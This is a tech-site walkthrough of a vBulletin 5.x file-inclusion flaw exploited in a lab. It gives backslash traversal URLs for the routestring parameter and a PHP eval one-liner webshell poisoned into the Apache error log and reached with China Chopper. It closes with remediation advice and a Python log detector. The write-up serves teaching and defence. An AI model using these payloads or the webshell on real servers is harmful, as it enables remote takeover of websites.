2025-03-28 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article walks through an example analysis of the remote code execution vulnerability in vBulletin 5.x. It is concise and easy to follow, and I hope you take something away from the detailed introduction below.
I. Vulnerability introduction
vBulletin has a file inclusion issue that allows a malicious visitor to include files from the vBulletin server and execute arbitrary PHP code. An unauthenticated malicious visitor can trigger the file inclusion by issuing a GET request to index.php that carries a routestring= parameter, which ultimately leads to remote code execution.
II. Vulnerability principle
When index.php receives a GET request whose routestring parameter points at a local file to include, several layers of functions are called to filter the value of routestring. Let's look at the main processing code.
The code is located in the file /includes/vb5/frontend/routing.php.
// Reject requests whose path ends in a static-asset extension with a 404
if (strlen($path) > 2)
{
    $ext = strtolower(substr($path, -4));
    if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css') OR (strtolower(substr($path, -3)) == '.js'))
    {
        header("HTTP/1.0 404 Not Found");
        die('');
    }
}
This code checks whether the value obtained from routestring ends with .gif, .png, .jpg, .css or .js. If it does, a 404 header is returned.
// No '/' in the path: hand the whole value to the legacy relay controller as a single argument
if (strpos($path, '/') === false)
{
    $this->controller = 'relay';
    $this->action = 'legacy';
    $this->template = '';
    $this->arguments = array($path);
    $this->queryParameters = array();
    return;
}
In this code, the strpos() function returns the position of the first / character in $path. If it returns false, processing continues; in other words, / may not appear in the path.
On a Linux server, / is the directory separator in a URL path, so there is no way to include other files on the site by stacking multiple ../ sequences. On a Windows server, however, / and \ are equivalent when expressing a path, and the program does not handle \ at all, so this file inclusion vulnerability applies to Windows servers.
Affected versions
Version number: vBulletin 5.x. The discoverer of the vulnerability contacted the vendor and did not receive a reply.
III. Vulnerability exploitation
In the practical part that follows, we gradually deepen our understanding and exploitation of the vulnerability: first we use the page's error output to obtain information about the server; then we include a file on the server to execute phpinfo() and verify code execution; finally we include the website log file, into which PHP code has been written, to obtain administrative control of the website.
Step 1 vulnerability verification
In this step we simply use the error output to obtain server information, then exploit the vulnerability to include a file that executes the phpinfo() function as verification.
1. Open the target URL 172.16.12.2/vb5/index.php; the home page of the website is as follows:
2. Visit the vulnerable page to view the error message
Open 172.16.12.2/vb5/index.php?routestring=.\\ in the browser, and the error message is as follows:
You can see that the page reports an error when require_once() is used to include the current path (C:\phpstudy\WWW\vb5/core/.\\). The error message reveals the absolute path of the website and the software used to build it: phpstudy.
When phpstudy builds a website, the l.php and phpinfo.php files are left in the web root by default; usually the webmaster deletes or modifies these two files. Because \ also acts as an escape character, \\ is equivalent to \, so we use \\ to prevent escaping (this experiment can also be completed without doing so).
3. Access the phpinfo.txt file
To verify the file inclusion, a phpinfo.txt file has been placed in the web root. First we try to access the file directly: http://172.16.12.2/phpinfo.txt
The website displays the text content directly.
4. Include the phpinfo.txt file
We then try to include the file by opening the constructed link http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\WWW\\phpinfo.txt
Since we already know the absolute path of the website on the server, we use multiple ..\ sequences followed by the file path to point at the file to be included. Once the file is included, the server parses it as PHP and executes the phpinfo() function.
phpinfo(): a PHP built-in function that outputs the configuration information of the PHP server.
Step 2 vulnerability exploitation
In general, the way to exploit a file inclusion vulnerability in PHP is to use the website's upload feature to upload a file containing malicious code, find the path of the uploaded file, construct a URL, and execute the malicious code through the inclusion vulnerability. This method does not work, however, when the site has no upload feature, when uploaded files are restricted so that we cannot learn their path, or when the parameters obtained from input are filtered.
As seen above, the program restricts the suffixes of included files. With no other option available, we can choose to include files that already exist on the website; that is the approach used in this experiment: including the website log files.
This time we include the Apache error log (error.log). Under phpstudy the path of this log file is: \phpstudy\apache\logs\error.log.
1. Write a one-liner into the log
First, we construct an access link that triggers an error and writes the code (a PHP one-line shell) into the error log.
Http://172.16.12.2/vb5/index.php
If this link is accessed directly, the one-liner is URL-encoded as %3C?php%20@eval($_POST[c]);?%3E, so the request has to be modified with Burp Suite.
Search for BurpLoader.jar using Everything, and double-click it to open Burp Suite.
Configure the proxy settings for the browser:
Open the Chrome browser on the desktop and visit chrome://settings, or click the customize button on the right side of the browser and choose "Settings" to enter the settings page.
Click "Show advanced settings" below, find the "Change proxy settings" button and open it, then select "LAN settings" in the dialog that pops up.
The specific configuration is shown in the following figure; confirm after modifying it.
After configuring the proxy, visit the link constructed above in the browser. Burp Suite automatically intercepts the request. Open Burp Suite > Proxy > Intercept, right-click in the text box below and select "Send to Repeater", then click the Repeater tab to modify the intercepted request.
We change the encoded link back to its pre-coding state, and the modified content is as follows:
Click the Go button to send the request. A 403 error is returned, and the server error log successfully records it in error.log.
We have now written the exploitation code into the log.
Note that the code must be written correctly: if the wrong code is written, the subsequent inclusion will not be able to execute it.
Now close Burp Suite and disable the proxy in the same place where the browser proxy was set above.
2. Construct the webshell connection address
We construct the access path according to the path of the log:
http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\apache\\logs\\error.log
Connecting with a one-liner client
Next, use China Chopper to connect to our one-liner: use Everything to search for and open chopper, right-click, select Add, fill in the link we constructed in the address field, enter the password c on the right, select PHP (Eval), and then click Add.
Double-click the link and the connection succeeds (if the connection fails here, check whether the written code is correct and whether the proxy has been disabled).
Including the log file requires knowing the server's log path, which administrators usually change in the relevant configuration, and the code written into the log must follow a strict format and encoding, so this is not the preferred exploitation method; it is, however, an approach that can be tried when no other exploitation point exists.
IV. Remediation suggestions
(1) While waiting for the vendor to release an official patch, individual users are advised to use alternative products.
(2) Enterprise users can modify the website source code and add filtering of the \ character.
(3) Website administrators can move sensitive files on the server to other locations to limit further exploitation of the vulnerability.
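To make the principle in section II and remediation (2) concrete, here is an added Python example that is not part of the original article or of vBulletin: it applies the missing backslash check (plus a separator-independent .. check) to routestring values pulled from constructed Apache access-log lines, so an administrator can find the attempts described above in existing logs. The log lines, IP address and timestamps are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not taken from the page's server);
# they replay the page's routestring values beside two benign routes.
SAMPLE_LOG = r'''
172.16.12.9 - - [31/May/2018:10:01:02 +0800] "GET /vb5/index.php?routestring=forum HTTP/1.1" 200 5120
172.16.12.9 - - [31/May/2018:10:01:05 +0800] "GET /vb5/index.php?routestring=.%5C%5C HTTP/1.1" 500 812
172.16.12.9 - - [31/May/2018:10:01:09 +0800] "GET /vb5/index.php?routestring=%5C%5C..%5C%5C..%5C%5Cphpstudy%5C%5CWWW%5C%5Cphpinfo.txt HTTP/1.1" 200 40211
172.16.12.9 - - [31/May/2018:10:02:15 +0800] "GET /vb5/index.php?routestring=\\..\\..\\phpstudy\\apache\\logs\\error.log HTTP/1.1" 200 9021
172.16.12.9 - - [31/May/2018:10:03:00 +0800] "GET /vb5/index.php?routestring=help/faq HTTP/1.1" 200 3301
'''.strip().splitlines()

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%5C, %255C, ...) before inspecting."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_routestring(value):
    """Return why a routestring is suspicious, or None if it looks benign.
    The backslash is the separator vBulletin's '/'-only check ignores on
    Windows (what remediation (2) filters); '..' segments are a second rule."""
    decoded = fully_decode(value)
    if '\\' in decoded:
        return 'backslash'
    if '..' in decoded.split('/'):
        return 'traversal'
    return None


def scan_access_log(lines):
    """Return (line_no, routestring, reason) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for value in query.get('routestring', []):
            reason = classify_routestring(value)
            if reason:
                hits.append((line_no, value, reason))
    return hits
```

Running scan_access_log(SAMPLE_LOG) flags lines 2, 3 and 4 (the error trigger, the phpinfo.txt include and the error.log include) with reason 'backslash', while the two normal routes pass.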
The above is an example analysis of the remote code execution vulnerability in vBulletin 5.x.